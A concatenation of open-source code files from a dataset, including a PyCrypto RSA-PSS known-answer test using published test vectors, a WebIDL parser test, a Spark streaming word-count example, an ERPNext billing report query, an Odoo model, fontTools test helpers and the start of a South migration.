            d5 f5 15 b2 3b 8a 41 e7 4a a8 67 69 3f 90 df b0
            61 a6 e8 6d fa ae e6 44 72 c0 0e 5f 20 94 57 29
            cb eb e7 7f 06 ce 78 e0 8f 40 98 fb a4 1f 9d 61
            93 c0 31 7e 8b 60 d4 b6 08 4a cb 42 d2 9e 38 08
            a3 bc 37 2d 85 e3 31 17 0f cb f7 cc 72 d0 b7 1c
            29 66 48 b3 a4 d1 0f 41 62 95 d0 80 7a a6 25 ca
            b2 74 4f d9 ea 8f d2 23 c4 25 37 02 98 28 bd 16
            be 02 54 6f 13 0f d2 e3 3b 93 6d 26 76 e0 8a ed
            1b 73 31 8b 75 0a 01 67 d0''',
            # Signature
            '''90 74 30 8f b5 98 e9 70 1b 22 94 38 8e 52 f9 71
            fa ac 2b 60 a5 14 5a f1 85 df 52 87 b5 ed 28 87
            e5 7c e7 fd 44 dc 86 34 e4 07 c8 e0 e4 36 0b c2
            26 f3 ec 22 7f 9d 9e 54 63 8e 8d 31 f5 05 12 15
            df 6e bb 9c 2f 95 79 aa 77 59 8a 38 f9 14 b5 b9
            c1 bd 83 c4 e2 f9 f3 82 a0 d0 aa 35 42 ff ee 65
            98 4a 60 1b c6 9e b2 8d eb 27 dc a1 2c 82 c2 d4
            c3 f6 6c d5 00 f1 ff 2b 99 4d 8a 4e 30 cb b3 3c''',
            # Salt
            '''de e9 59 c7 e0 64 11 36 14 20 ff 80 18 5e d5 7f
            3e 67 76 af''',
            # Hash
            SHA
        ),

        #
        # Example 1.2 to be found in
        # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
        #
        (
            # Private key
            {
                'n': '''a5 6e 4a 0e 70 10 17 58 9a 51 87 dc 7e a8 41 d1
                56 f2 ec 0e 36 ad 52 a4 4d fe b1 e6 1f 7a d9 91
                d8 c5 10 56 ff ed b1 62 b4 c0 f2 83 a1 2a 88 a3
                94 df f5 26 ab 72 91 cb b3 07 ce ab fc e0 b1 df
                d5 cd 95 08 09 6d 5b 2b 8b 6d f5 d6 71 ef 63 77
                c0 92 1c b2 3c 27 0a 70 e2 59 8e 6f f8 9d 19 f1
                05 ac c2 d3 f0 cb 35 f2 92 80 e1 38 6b 6f 64 c4
                ef 22 e1 e1 f2 0d 0c e8 cf fb 22 49 bd 9a 21 37''',
                'e': '''01 00 01''',
                'd': '''33 a5 04 2a 90 b2 7d 4f 54 51 ca 9b bb d0 b4 47
                71 a1 01 af 88 43 40 ae f9 88 5f 2a 4b be 92 e8
                94 a7 24 ac 3c 56 8c 8f 97 85 3a d0 7c 02 66 c8
                c6 a3 ca 09 29 f1 e8 f1 12 31 88 44 29 fc 4d 9a
                e5 5f ee 89 6a 10 ce 70 7c 3e d7 e7 34 e4 47 27
                a3 95 74 50 1a 53 26 83 10 9c 2a ba ca ba 28 3c
                31 b4 bd 2f 53 c3 ee 37 e3 52 ce e3 4f 9e 50 3b
                d8 0c 06 22 ad 79 c6 dc ee 88 35 47 c6 a3 b3 25'''
            },
            # Message
            '''85 13 84 cd fe 81 9c 22 ed 6c 4c cb 30 da eb 5c
            f0 59 bc 8e 11 66 b7 e3 53 0c 4c 23 3e 2b 5f 8f
            71 a1 cc a5 82 d4 3e cc 72 b1 bc a1 6d fc 70 13
            22 6b 9e''',
            # Signature
            '''3e f7 f4 6e 83 1b f9 2b 32 27 41 42 a5 85 ff ce
            fb dc a7 b3 2a e9 0d 10 fb 0f 0c 72 99 84 f0 4e
            f2 9a 9d f0 78 07 75 ce 43 73 9b 97 83 83 90 db
            0a 55 05 e6 3d e9 27 02 8d 9d 29 b2 19 ca 2c 45
            17 83 25 58 a5 5d 69 4a 6d 25 b9 da b6 60 03 c4
            cc cd 90 78 02 19 3b e5 17 0d 26 14 7d 37 b9 35
            90 24 1b e5 1c 25 05 5f 47 ef 62 75 2c fb e2 14
            18 fa fe 98 c2 2c 4d 4d 47 72 4f db 56 69 e8 43''',
            # Salt
            '''ef 28 69 fa 40 c3 46 cb 18 3d ab 3d 7b ff c9 8f
            d5 6d f4 2d''',
            # Hash
            SHA
        ),

        #
        # Example 2.1 to be found in
        # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
        #
        (
            # Private key
            {
                'n': '''01 d4 0c 1b cf 97 a6 8a e7 cd bd 8a 7b f3 e3 4f
                a1 9d cc a4 ef 75 a4 74 54 37 5f 94 51 4d 88 fe
                d0 06 fb 82 9f 84 19 ff 87 d6 31 5d a6 8a 1f f3
                a0 93 8e 9a bb 34 64 01 1c 30 3a d9 91 99 cf 0c
                7c 7a 8b 47 7d ce 82 9e 88 44 f6 25 b1 15 e5 e9
                c4 a5 9c f8 f8 11 3b 68 34 33 6a 2f d2 68 9b 47
                2c bb 5e 5c ab e6 74 35 0c 59 b6 c1 7e 17 68 74
                fb 42 f8 fc 3d 17 6a 01 7e dc 61 fd 32 6c 4b 33
                c9''',
                'e': '''01 00 01''',
                'd': '''02 7d 14 7e 46 73 05 73 77 fd 1e a2 01 56 57 72
                17 6a 7d c3 83 58 d3 76 04 56 85 a2 e7 87 c2 3c
                15 57 6b c1 6b 9f 44 44 02 d6 bf c5 d9 8a 3e 88
                ea 13 ef 67 c3 53 ec a0 c0 dd ba 92 55 bd 7b 8b
                b5 0a 64 4a fd fd 1d d5 16 95 b2 52 d2 2e 73 18
                d1 b6 68 7a 1c 10 ff 75 54 5f 3d b0 fe 60 2d 5f
                2b 7f 29 4e 36 01 ea b7 b9 d1 ce cd 76 7f 64 69
                2e 3e 53 6c a2 84 6c b0 c2 dd 48 6a 39 fa 75 b1'''
            },
            # Message
            '''da ba 03 20 66 26 3f ae db 65 98 48 11 52 78 a5
            2c 44 fa a3 a7 6f 37 51 5e d3 36 32 10 72 c4 0a
            9d 9b 53 bc 05 01 40 78 ad f5 20 87 51 46 aa e7
            0f f0 60 22 6d cb 7b 1f 1f c2 7e 93 60''',
            # Signature
            '''01 4c 5b a5 33 83 28 cc c6 e7 a9 0b f1 c0 ab 3f
            d6 06 ff 47 96 d3 c1 2e 4b 63 9e d9 13 6a 5f ec
            6c 16 d8 88 4b dd 99 cf dc 52 14 56 b0 74 2b 73
            68 68 cf 90 de 09 9a db 8d 5f fd 1d ef f3 9b a4
            00 7a b7 46 ce fd b2 2d 7d f0 e2 25 f5 46 27 dc
            65 46 61 31 72 1b 90 af 44 53 63 a8 35 8b 9f 60
            76 42 f7 8f ab 0a b0 f4 3b 71 68 d6 4b ae 70 d8
            82 78 48 d8 ef 1e 42 1c 57 54 dd f4 2c 25 89 b5
            b3''',
            # Salt
            '''57 bf 16 0b cb 02 bb 1d c7 28 0c f0 45 85 30 b7
            d2 83 2f f7''',
            SHA
        ),

        #
        # Example 8.1 to be found in
        # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
        #
        (
            # Private key
            {
                'n': '''49 53 70 a1 fb 18 54 3c 16 d3 63 1e 31 63 25 5d
                f6 2b e6 ee e8 90 d5 f2 55 09 e4 f7 78 a8 ea 6f
                bb bc df 85 df f6 4e 0d 97 20 03 ab 36 81 fb ba
                6d d4 1f d5 41 82 9b 2e 58 2d e9 f2 a4 a4 e0 a2
                d0 90 0b ef 47 53 db 3c ee 0e e0 6c 7d fa e8 b1
                d5 3b 59 53 21 8f 9c ce ea 69 5b 08 66 8e de aa
                dc ed 94 63 b1 d7 90 d5 eb f2 7e 91 15 b4 6c ad
                4d 9a 2b 8e fa b0 56 1b 08 10 34 47 39 ad a0 73
                3f''',
                'e': '''01 00 01''',
                'd': '''6c 66 ff e9 89 80 c3 8f cd ea b5 15 98 98 83 61
                65 f4 b4 b8 17 c4 f6 a8 d4 86 ee 4e a9 13 0f e9
                b9 09 2b d1 36 d1 84 f9 5f 50 4a 60 7e ac 56 58
                46 d2 fd d6 59 7a 89 67 c7 39 6e f9 5a 6e ee bb
                45 78 a6 43 96 6d ca 4d 8e e3 de 84 2d e6 32 79
                c6 18 15 9c 1a b5 4a 89 43 7b 6a 61 20 e4 93 0a
                fb 52 a4 ba 6c ed 8a 49 47 ac 64 b3 0a 34 97 cb
                e7 01 c2 d6 26 6d 51 72 19 ad 0e c6 d3 47 db e9'''
            },
            # Message
            '''81 33 2f 4b e6 29 48 41 5e a1 d8 99 79 2e ea cf
            6c 6e 1d b1 da 8b e1 3b 5c ea 41 db 2f ed 46 70
            92 e1 ff 39 89 14 c7 14 25 97 75 f5 95 f8 54 7f
            73 56 92 a5 75 e6 92 3a f7 8f 22 c6 99 7d db 90
            fb 6f 72 d7 bb 0d d5 74 4a 31 de cd 3d c3 68 58
            49 83 6e d3 4a ec 59 63 04 ad 11 84 3c 4f 88 48
            9f 20 97 35 f5 fb 7f da f7 ce c8 ad dc 58 18 16
            8f 88 0a cb f4 90 d5 10 05 b7 a8 e8 4e 43 e5 42
            87 97 75 71 dd 99 ee a4 b1 61 eb 2d f1 f5 10 8f
            12 a4 14 2a 83 32 2e db 05 a7 54 87 a3 43 5c 9a
            78 ce 53 ed 93 bc 55 08 57 d7 a9 fb''',
            # Signature
            '''02 62 ac 25 4b fa 77 f3 c1 ac a2 2c 51 79 f8 f0
            40 42 2b 3c 5b af d4 0a 8f 21 cf 0f a5 a6 67 cc
            d5 99 3d 42 db af b4 09 c5 20 e2 5f ce 2b 1e e1
            e7 16 57 7f 1e fa 17 f3 da 28 05 2f 40 f0 41 9b
            23 10 6d 78 45 aa f0 11 25 b6 98 e7 a4 df e9 2d
            39 67 bb 00 c4 d0 d3 5b a3 55 2a b9 a8 b3 ee f0
            7c 7f ec db c5 42 4a c4 db 1e 20 cb 37 d0 b2 74
            47 69 94 0e a9 07 e1 7f bb ca 67 3b 20 52 23 80
            c5''',
            # Salt
            '''1d 65 49 1d 79 c8 64 b3 73 00 9b e6 f6 f2 46 7b
            ac 4c 78 fa''',
            SHA
        )
    )

    def testSign1(self):
        """Sign every vector with its fixed salt; compare to the known answer."""
        for i in range(len(self._testData)):
            # Build the key
            comps = [long(rws(self._testData[i][0][x]), 16) for x in ('n', 'e', 'd')]
            key = MyKey(RSA.construct(comps))
            # Hash function
            h = self._testData[i][4].new()
            # Data to sign
            h.update(t2b(self._testData[i][1]))
            # Salt: shadowing _randfunc makes signing deterministic, so the
            # output can be compared byte-for-byte with the test vector.
            test_salt = t2b(self._testData[i][3])
            key._randfunc = lambda N: test_salt
            # The real test
            signer = PKCS.new(key)
            self.failUnless(signer.can_sign())
            s = signer.sign(h)
            self.assertEqual(s, t2b(self._testData[i][2]))

    def testVerify1(self):
        """Verify every known-answer signature with the public key only."""
        for i in range(len(self._testData)):
            # Build the key (public part only -- no 'd')
            comps = [long(rws(self._testData[i][0][x]), 16) for x in ('n', 'e')]
            key = MyKey(RSA.construct(comps))
            # Hash function
            h = self._testData[i][4].new()
            # Data to sign
            h.update(t2b(self._testData[i][1]))
            # Salt
            test_salt = t2b(self._testData[i][3])
            # The real test
            key._randfunc = lambda N: test_salt
            verifier = PKCS.new(key)
            self.failIf(verifier.can_sign())
            result = verifier.verify(h, t2b(self._testData[i][2]))
            self.failUnless(result)

    def testSignVerify(self):
        """Round-trip sign/verify across hashes, salt lengths and custom MGFs."""
        h = SHA.new()
        h.update(b('blah blah blah'))
        rng = Random.new().read
        key = MyKey(RSA.generate(1024, rng))

        # Helper function to monitor what's request from MGF
        global mgfcalls
        def newMGF(seed, maskLen):
            global mgfcalls
            mgfcalls += 1
            return bchr(0x00) * maskLen

        # Verify that PSS is friendly to all ciphers
        for hashmod in (MD2, MD5, SHA, SHA224, SHA256, SHA384, RIPEMD):
            h = hashmod.new()
            h.update(b('blah blah blah'))

            # Verify that sign() asks for as many random bytes
            # as the hash output size
            key.asked = 0
            signer = PKCS.new(key)
            s = signer.sign(h)
            self.failUnless(signer.verify(h, s))
            self.assertEqual(key.asked, h.digest_size)

        h = SHA.new()
        h.update(b('blah blah blah'))

        # Verify that sign() uses a different salt length
        for sLen in (0, 3, 21):
            key.asked = 0
            signer = PKCS.new(key, saltLen=sLen)
            s = signer.sign(h)
            self.assertEqual(key.asked, sLen)
            self.failUnless(signer.verify(h, s))

        # Verify that sign() uses the custom MGF
        mgfcalls = 0
        signer = PKCS.new(key, newMGF)
        s = signer.sign(h)
        self.assertEqual(mgfcalls, 1)
        self.failUnless(signer.verify(h, s))

        # Verify that sign() does not call the RNG
        # when salt length is 0, even when a new MGF is provided
        key.asked = 0
        mgfcalls = 0
        signer = PKCS.new(key, newMGF, 0)
        s = signer.sign(h)
        self.assertEqual(key.asked, 0)
        self.assertEqual(mgfcalls, 1)
        self.failUnless(signer.verify(h, s))
def get_tests(config={}):
    """Return a fresh list of the test cases defined in this module."""
    return list(list_test_cases(PKCS1_PSS_Tests))
if __name__ == '__main__':
    # PEP 8 (E731): use a def instead of assigning a lambda to a name.
    # unittest.main looks the suite factory up by the *name* 'suite' on this
    # module, so behaviour is unchanged.
    def suite():
        return unittest.TestSuite(get_tests())
    unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
| gpl-3.0 |
def WebIDLTest(parser, harness):
    """
    Exercise the WebIDL [Unforgeable] rules: inheriting from an interface
    with unforgeable members is fine (even when the child declares a
    constant or static member of the same name), but a non-static attribute
    or operation that would shadow an unforgeable member -- whether on a
    parent or on a (possibly ancestral) consequential interface -- must be
    rejected by the parser.
    """
    parser.parse("""
        interface Child : Parent {
        };
        interface Parent {
          [Unforgeable] readonly attribute long foo;
        };
    """)

    results = parser.finish()
    harness.check(len(results), 2,
                  "Should be able to inherit from an interface with "
                  "[Unforgeable] properties.")

    parser = parser.reset()
    parser.parse("""
        interface Child : Parent {
          const short foo = 10;
        };
        interface Parent {
          [Unforgeable] readonly attribute long foo;
        };
    """)

    results = parser.finish()
    harness.check(len(results), 2,
                  "Should be able to inherit from an interface with "
                  "[Unforgeable] properties even if we have a constant with "
                  "the same name.")

    parser = parser.reset()
    parser.parse("""
        interface Child : Parent {
          static attribute short foo;
        };
        interface Parent {
          [Unforgeable] readonly attribute long foo;
        };
    """)

    results = parser.finish()
    harness.check(len(results), 2,
                  "Should be able to inherit from an interface with "
                  "[Unforgeable] properties even if we have a static attribute "
                  "with the same name.")

    parser = parser.reset()
    parser.parse("""
        interface Child : Parent {
          static void foo();
        };
        interface Parent {
          [Unforgeable] readonly attribute long foo;
        };
    """)

    results = parser.finish()
    harness.check(len(results), 2,
                  "Should be able to inherit from an interface with "
                  "[Unforgeable] properties even if we have a static operation "
                  "with the same name.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
              void foo();
            };
            interface Parent {
              [Unforgeable] readonly attribute long foo;
            };
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw,
               "Should have thrown when shadowing unforgeable attribute on "
               "parent with operation.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
              void foo();
            };
            interface Parent {
              [Unforgeable] void foo();
            };
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw,
               "Should have thrown when shadowing unforgeable operation on "
               "parent with operation.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
              attribute short foo;
            };
            interface Parent {
              [Unforgeable] readonly attribute long foo;
            };
        """)

        results = parser.finish()
    except Exception:
        # The original used the Python 2-only ``except Exception, x`` form;
        # ``x`` was never used, so the binding is dropped (Python 3 safe).
        threw = True

    harness.ok(threw,
               "Should have thrown when shadowing unforgeable attribute on "
               "parent with attribute.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
              attribute short foo;
            };
            interface Parent {
              [Unforgeable] void foo();
            };
        """)

        results = parser.finish()
    except Exception:
        # Same Python 2-only ``except Exception, x`` cleanup as above.
        threw = True

    harness.ok(threw,
               "Should have thrown when shadowing unforgeable operation on "
               "parent with attribute.")

    parser = parser.reset()
    parser.parse("""
        interface Child : Parent {
        };
        interface Parent {};
        interface Consequential {
          [Unforgeable] readonly attribute long foo;
        };
        Parent implements Consequential;
    """)

    results = parser.finish()
    harness.check(len(results), 4,
                  "Should be able to inherit from an interface with a "
                  "consequential interface with [Unforgeable] properties.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
              void foo();
            };
            interface Parent {};
            interface Consequential {
              [Unforgeable] readonly attribute long foo;
            };
            Parent implements Consequential;
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw,
               "Should have thrown when shadowing unforgeable attribute "
               "of parent's consequential interface.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
            };
            interface Parent : GrandParent {};
            interface GrandParent {};
            interface Consequential {
              [Unforgeable] readonly attribute long foo;
            };
            GrandParent implements Consequential;
            interface ChildConsequential {
              void foo();
            };
            Child implements ChildConsequential;
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw,
               "Should have thrown when our consequential interface shadows unforgeable attribute "
               "of ancestor's consequential interface.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface Child : Parent {
            };
            interface Parent : GrandParent {};
            interface GrandParent {};
            interface Consequential {
              [Unforgeable] void foo();
            };
            GrandParent implements Consequential;
            interface ChildConsequential {
              void foo();
            };
            Child implements ChildConsequential;
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw,
               "Should have thrown when our consequential interface shadows unforgeable operation "
               "of ancestor's consequential interface.")

    parser = parser.reset()
    parser.parse("""
        interface iface {
          [Unforgeable] attribute long foo;
        };
    """)

    results = parser.finish()
    harness.check(len(results), 1,
                  "Should allow writable [Unforgeable] attribute.")

    parser = parser.reset()
    threw = False
    try:
        parser.parse("""
            interface iface {
              [Unforgeable] static readonly attribute long foo;
            };
        """)

        results = parser.finish()
    except:
        threw = True

    harness.ok(threw, "Should have thrown for static [Unforgeable] attribute.")
| mpl-2.0 |
BryanCutler/spark | examples/src/main/python/streaming/stateful_network_wordcount.py | 27 | 2235 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the
network every second.
Usage: stateful_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Spark Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/streaming/stateful_network_wordcount.py \
localhost 9999`
"""
import sys
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
    # Require exactly <hostname> and <port> on the command line.
    if len(sys.argv) != 3:
        print("Usage: stateful_network_wordcount.py <hostname> <port>", file=sys.stderr)
        sys.exit(-1)
    sc = SparkContext(appName="PythonStreamingStatefulNetworkWordCount")
    # 1-second micro-batches; checkpointing is mandatory for stateful ops.
    ssc = StreamingContext(sc, 1)
    ssc.checkpoint("checkpoint")

    # RDD with initial state (key, value) pairs
    initialStateRDD = sc.parallelize([(u'hello', 1), (u'world', 1)])

    def updateFunc(new_values, last_sum):
        # Fold this batch's counts into the running total; last_sum is
        # None the first time a key is seen.
        return sum(new_values) + (last_sum or 0)

    lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2]))
    # Classic word count, but accumulated across batches via updateStateByKey.
    running_counts = lines.flatMap(lambda line: line.split(" "))\
        .map(lambda word: (word, 1))\
        .updateStateByKey(updateFunc, initialRDD=initialStateRDD)

    running_counts.pprint()

    ssc.start()
    ssc.awaitTermination()
| apache-2.0 |
ESS-LLP/erpnext-medical | erpnext/accounts/report/non_billed_report.py | 40 | 1801 | # Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext import get_default_currency
from frappe.model.meta import get_field_precision
def get_ordered_to_be_billed_data(args):
    """Return rows for submitted, non-closed documents whose items are not
    yet fully billed.

    args is expected to carry 'doctype', 'party' ('customer'/'supplier'),
    'date' (the parent's date field name), 'order' and 'order_by'
    -- presumably supplied by the report wrappers; verify against callers.
    """
    doctype, party = args.get('doctype'), args.get('party')
    child_tab = doctype + " Item"
    # Round with the precision configured for billed_amt so the comparison
    # below matches displayed values; fall back to 2 decimal places.
    precision = get_field_precision(frappe.get_meta(child_tab).get_field("billed_amt"),
        currency=get_default_currency()) or 2

    project_field = get_project_field(doctype, party)

    # NOTE(review): table/field names are interpolated straight into the SQL
    # string -- safe only while args originates from trusted server-side code,
    # never from user input.
    return frappe.db.sql("""
        Select
            `{parent_tab}`.name, `{parent_tab}`.{date_field}, `{parent_tab}`.{party}, `{parent_tab}`.{party}_name,
            {project_field}, `{child_tab}`.item_code, `{child_tab}`.base_amount,
            (`{child_tab}`.billed_amt * ifnull(`{parent_tab}`.conversion_rate, 1)),
            (`{child_tab}`.base_amount - (`{child_tab}`.billed_amt * ifnull(`{parent_tab}`.conversion_rate, 1))),
            `{child_tab}`.item_name, `{child_tab}`.description, `{parent_tab}`.company
        from
            `{parent_tab}`, `{child_tab}`
        where
            `{parent_tab}`.name = `{child_tab}`.parent and `{parent_tab}`.docstatus = 1 and `{parent_tab}`.status != 'Closed'
            and `{child_tab}`.amount > 0 and round(`{child_tab}`.billed_amt *
            ifnull(`{parent_tab}`.conversion_rate, 1), {precision}) < `{child_tab}`.base_amount
        order by
            `{parent_tab}`.{order} {order_by}
        """.format(parent_tab = 'tab' + doctype, child_tab = 'tab' + child_tab, precision= precision, party = party,
        date_field = args.get('date'), project_field = project_field, order= args.get('order'), order_by = args.get('order_by')))
def get_project_field(doctype, party):
    """Return the backtick-quoted SQL reference to the project column.

    For supplier-side documents (e.g. Purchase Order) the project is
    stored on the child item table, so the " Item" suffix is appended;
    customer-side documents keep it on the parent.
    """
    if party == "supplier":
        doctype = doctype + " Item"
    return "`tab{0}`.project".format(doctype)
damdam-s/hr | __unported__/hr_worked_days_from_timesheet/hr_employee.py | 21 | 1239 | # -*- coding:utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 - 2014 Odoo Canada. All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class hr_employee(orm.Model):
    """Extend hr.employee with a one2many link to the employee's timesheets."""
    # Re-declare _name/_inherit with the same model so the column is added
    # to the existing hr.employee model (OpenERP 7 inheritance idiom).
    _name = "hr.employee"
    _inherit = "hr.employee"

    _columns = {
        # All timesheet sheets recorded against this employee.
        'timesheet_sheet_ids': fields.one2many(
            'hr_timesheet_sheet.sheet',
            'employee_id',
            'Timesheets'
        )
    }
| agpl-3.0 |
google/material-design-icons | update/venv/lib/python3.9/site-packages/fontTools/misc/testTools.py | 5 | 5433 | """Helpers for writing unit tests."""
from collections.abc import Iterable
from io import BytesIO
import os
import shutil
import sys
import tempfile
from unittest import TestCase as _TestCase
from fontTools.misc.py23 import tobytes
from fontTools.misc.xmlWriter import XMLWriter
def parseXML(xmlSnippet):
    """Parses a snippet of XML.

    Input can be either a single string (unicode or UTF-8 bytes), or
    a sequence of strings.

    The result is in the same format that would be returned by
    XMLReader, but the parser imposes no constraints on the root
    element so it can be called on small snippets of TTX files.
    """
    # To support snippets with multiple elements, we add a fake root.
    reader = TestXMLReader_()
    xml = b"<root>"
    if isinstance(xmlSnippet, bytes):
        xml += xmlSnippet
    elif isinstance(xmlSnippet, str):
        xml += tobytes(xmlSnippet, 'utf-8')
    elif isinstance(xmlSnippet, Iterable):
        # A sequence of strings: encode and concatenate each piece.
        xml += b"".join(tobytes(s, 'utf-8') for s in xmlSnippet)
    else:
        raise TypeError("expected string or sequence of strings; found %r"
                        % type(xmlSnippet).__name__)
    xml += b"</root>"
    reader.parser.Parse(xml, 0)
    # Return only the fake root's children, i.e. the snippet's own elements.
    return reader.root[2]
class FakeFont:
    """Minimal stand-in for a TTFont: a fixed glyph order plus a plain
    dict of tables, exposing the handful of lookup methods tests need."""

    def __init__(self, glyphs):
        self.glyphOrder_ = glyphs
        self.reverseGlyphOrderDict_ = dict(zip(glyphs, range(len(glyphs))))
        self.lazy = False
        self.tables = {}

    def __getitem__(self, tag):
        return self.tables[tag]

    def __setitem__(self, tag, table):
        self.tables[tag] = table

    def get(self, tag, default=None):
        return self.tables.get(tag, default)

    def getGlyphID(self, name):
        return self.reverseGlyphOrderDict_[name]

    def getGlyphName(self, glyphID):
        # IDs past the end of the glyph order get a synthetic name,
        # mirroring TTFont's behaviour.
        if glyphID >= len(self.glyphOrder_):
            return "glyph%.5d" % glyphID
        return self.glyphOrder_[glyphID]

    def getGlyphOrder(self):
        return self.glyphOrder_

    def getReverseGlyphMap(self):
        return self.reverseGlyphOrderDict_

    def getGlyphNames(self):
        return sorted(self.getGlyphOrder())
class TestXMLReader_(object):
    """Tiny expat-based reader building a tree of (name, attrs, content)
    triples; character data is appended to *content* as plain strings."""

    def __init__(self):
        from xml.parsers.expat import ParserCreate
        self.parser = ParserCreate()
        self.parser.StartElementHandler = self.startElement_
        self.parser.EndElementHandler = self.endElement_
        self.parser.CharacterDataHandler = self.addCharacterData_
        self.root = None
        self.stack = []

    def startElement_(self, name, attrs):
        # New node: attach to the current parent, or make it the root.
        node = (name, attrs, [])
        if not self.stack:
            self.root = node
        else:
            self.stack[-1][2].append(node)
        self.stack.append(node)

    def endElement_(self, name):
        self.stack.pop()

    def addCharacterData_(self, data):
        # Text goes into the content list of the innermost open element.
        self.stack[-1][2].append(data)
def makeXMLWriter(newlinestr='\n'):
    """Return an XMLWriter over an in-memory buffer, with the XML
    declaration removed so tests compare only the written elements."""
    # don't write OS-specific new lines
    writer = XMLWriter(BytesIO(), newlinestr=newlinestr)
    # erase XML declaration
    writer.file.seek(0)
    writer.file.truncate()
    return writer
def getXML(func, ttFont=None):
    """Call the passed toXML function and return the written content as a
    list of lines (unicode strings).

    Result is stripped of XML declaration and OS-specific newline characters.
    """
    buf_writer = makeXMLWriter()
    func(buf_writer, ttFont)
    raw = buf_writer.file.getvalue()
    text = raw.decode("utf-8")
    # toXML methods must always end with a writer.newline()
    assert text[-1:] == "\n"
    return text.splitlines()
class MockFont(object):
    """A font-like object that automatically adds any looked up glyphname
    to its glyphOrder."""

    def __init__(self):
        self._glyphOrder = ['.notdef']
        outer = self

        class _AllocatingDict(dict):
            # Looking up a missing name allocates the next free glyph ID
            # and records the name in the outer font's glyph order.  Note
            # this fires for *any* missing lookup, including ones done
            # through getReverseGlyphMap().
            def __missing__(mapping, key):
                outer._glyphOrder.append(key)
                gid = len(mapping)
                mapping[key] = gid
                return gid

        self._reverseGlyphOrder = _AllocatingDict({'.notdef': 0})
        self.lazy = False

    def getGlyphID(self, glyph, requireReal=None):
        return self._reverseGlyphOrder[glyph]

    def getReverseGlyphMap(self):
        return self._reverseGlyphOrder

    def getGlyphName(self, gid):
        return self._glyphOrder[gid]

    def getGlyphOrder(self):
        return self._glyphOrder
class TestCase(_TestCase):
    """unittest.TestCase with a Python 2/3 compatibility shim for the
    renamed assertRaisesRegex method."""

    def __init__(self, methodName):
        _TestCase.__init__(self, methodName)
        # Python 3 renamed assertRaisesRegexp to assertRaisesRegex,
        # and fires deprecation warnings if a program uses the old name.
        if not hasattr(self, "assertRaisesRegex"):
            self.assertRaisesRegex = self.assertRaisesRegexp
class DataFilesHandler(TestCase):
    """TestCase that locates on-disk fixture files and manages a lazily
    created temporary directory, removed again after every test."""

    def setUp(self):
        self.tempdir = None
        self.num_tempfiles = 0

    def tearDown(self):
        # Only clean up if a temp directory was actually created.
        if self.tempdir:
            shutil.rmtree(self.tempdir)

    def getpath(self, testfile):
        # Fixtures live in a "data" directory beside the test module.
        module_dir = os.path.dirname(sys.modules[self.__module__].__file__)
        return os.path.join(module_dir, "data", testfile)

    def temp_dir(self):
        # Create the scratch directory on first use only.
        if self.tempdir is None:
            self.tempdir = tempfile.mkdtemp()

    def temp_font(self, font_path, file_name):
        self.temp_dir()
        target = os.path.join(self.tempdir, file_name)
        shutil.copy2(font_path, target)
        return target
| apache-2.0 |
ReachingOut/unisubs | apps/auth/migrations/0007_auto__chg_field_awards_user.py | 5 | 6235 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: makes Awards.user nullable."""

    def forwards(self, orm):
        # Changing field 'Awards.user': allow NULL user references.
        db.alter_column('auth_awards', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.CustomUser'], null=True))

    def backwards(self, orm):
        # Changing field 'Awards.user': restore NOT NULL constraint.
        db.alter_column('auth_awards', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.CustomUser']))

    # Frozen ORM snapshot generated by South -- do not edit by hand.
    models = {
        'auth.awards': {
            'Meta': {'object_name': 'Awards'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
